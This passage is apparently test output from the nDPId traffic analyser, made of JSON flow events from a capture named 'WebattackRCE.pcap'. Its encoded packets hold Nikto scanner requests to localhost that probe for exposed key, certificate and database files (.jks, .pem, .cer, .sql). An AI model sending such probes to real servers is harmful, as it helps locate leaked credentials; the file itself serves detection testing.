+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
